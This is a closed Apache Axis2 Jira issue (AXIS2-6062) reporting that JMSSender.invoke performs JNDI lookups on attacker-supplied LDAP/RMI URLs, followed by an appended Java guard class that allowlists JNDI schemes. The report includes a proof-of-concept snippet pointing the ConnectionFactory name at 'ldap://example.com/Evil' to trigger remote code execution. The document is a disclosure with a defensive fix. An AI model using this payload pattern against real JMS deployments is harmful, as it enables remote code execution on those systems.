[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Robert Lazarski closed AXIS2-6062.
----------------------------------
    Resolution: Fixed

> Is such flexibility necessary, allowing the LDAP (and RMI, JRMP, etc.) protocol in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
>                 Key: AXIS2-6062
>                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
>             Project: Axis2
>          Issue Type: Bug
>          Components: JMS transport
>    Affects Versions: 1.8.2
>            Reporter: Letian Yuan
>            Assignee: Robert Lazarski
>            Priority: Critical
>             Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method,
> `org.apache.axis2.transport.jms.JMSSender.invoke`, designed to send a
> JMS message. However, if we send a JMS message like this:
>
>     MessageContext context = new MessageContext();
>     context.setProperty("TransportURL",
>         "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");
>     JMSSender sender = new JMSSender();
>     sender.invoke(context);
>
> Then, arbitrary commands from the remote server "ldap://example.com/Evil" would
> be executed.
> We want to discuss this with you.
> First, executing arbitrary commands from a remote server is quite dangerous.
> Second, as far as we know, no one would use the LDAP protocol to get a
> `ConnectionFactory`.
> Third, it seems this behavior has not been documented in your "User's Guide",
> so library users might not know this API for sending JMS messages can be used
> to execute arbitrary commands. So, I think that library users are very
> likely to misuse this API, for example by concatenating user input into the
> parameter of `invoke`, or by making the parameter of `invoke`
> available in a configuration file such as `foobar.properties`. We
> know that such cases rarely happen and might not be your design purpose, but
> it is possible anyway. As long as an attacker can control the parameter of
> `invoke`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether
> it is necessary for the LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
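The mitigation a sender can apply before any JNDI lookup, as an added example that is neither Axis2's code nor the reporter's: a hypothetical `JndiNameGuard` pulls the `transport.jms.ConnectionFactoryJNDIName` parameter (the name is taken from the report) out of a jms:// transport URL and refuses any value whose scheme is not on a small local allowlist, so a caller-controlled URL cannot steer the lookup to an LDAP or RMI server. The class name, the query-string parsing, the allowlist and the Java 11+ API calls are assumptions of this example.

```java
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.*;

// Hypothetical guard (added example, not Axis2 code) for the JNDI name a jms:// URL carries.
public class JndiNameGuard {
    // Parameter name as it appears in the report; everything else here is assumed.
    static final String CF_PARAM = "transport.jms.ConnectionFactoryJNDIName";
    static final Set<String> ALLOWED_SCHEMES = Set.of("java"); // assumption: local namespace only
    static final Pattern SCHEME = Pattern.compile("^([A-Za-z][A-Za-z0-9+.-]*):");

    // Splits the query string into decoded pairs; decode first, so "ldap%3A" is seen as "ldap:".
    static Map<String, String> queryParams(String transportUrl) throws URISyntaxException {
        Map<String, String> params = new HashMap<>();
        String query = new URI(transportUrl).getRawQuery();
        if (query == null) return params;
        for (String pair : query.split("&")) {
            String[] kv = pair.split("=", 2);
            params.put(URLDecoder.decode(kv[0], StandardCharsets.UTF_8),
                       URLDecoder.decode(kv.length > 1 ? kv[1] : "", StandardCharsets.UTF_8));
        }
        return params;
    }

    // A "scheme:" prefix makes InitialContext hand the name to a URL context factory, so
    // ldap:, rmi:, iiop: etc. would reach out to a server chosen by whoever built the URL.
    static boolean isAllowedJndiName(String name) {
        if (name == null || name.isEmpty()) return false;
        Matcher m = SCHEME.matcher(name);
        if (!m.find()) return true; // plain name such as "QueueConnectionFactory"
        return ALLOWED_SCHEMES.contains(m.group(1).toLowerCase(Locale.ROOT));
    }

    // Returns the ConnectionFactory JNDI name, or throws before any lookup happens.
    static String safeConnectionFactoryName(String transportUrl) throws URISyntaxException {
        String name = queryParams(transportUrl).get(CF_PARAM);
        if (!isAllowedJndiName(name)) throw new IllegalArgumentException("refusing JNDI name: " + name);
        return name;
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the report's payload, then a local "java:" name.
        for (String url : new String[] {
                "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil",
                "jms://foobar?transport.jms.ConnectionFactoryJNDIName=java:comp/env/jms/CF"}) {
            try { System.out.println("accepted: " + safeConnectionFactoryName(url)); }
            catch (IllegalArgumentException e) { System.out.println("rejected: " + e.getMessage()); }
        }
    }
}
```

The guard covers only the one parameter named in the report; any other JNDI setting a transport URL is allowed to carry would need the same scheme check.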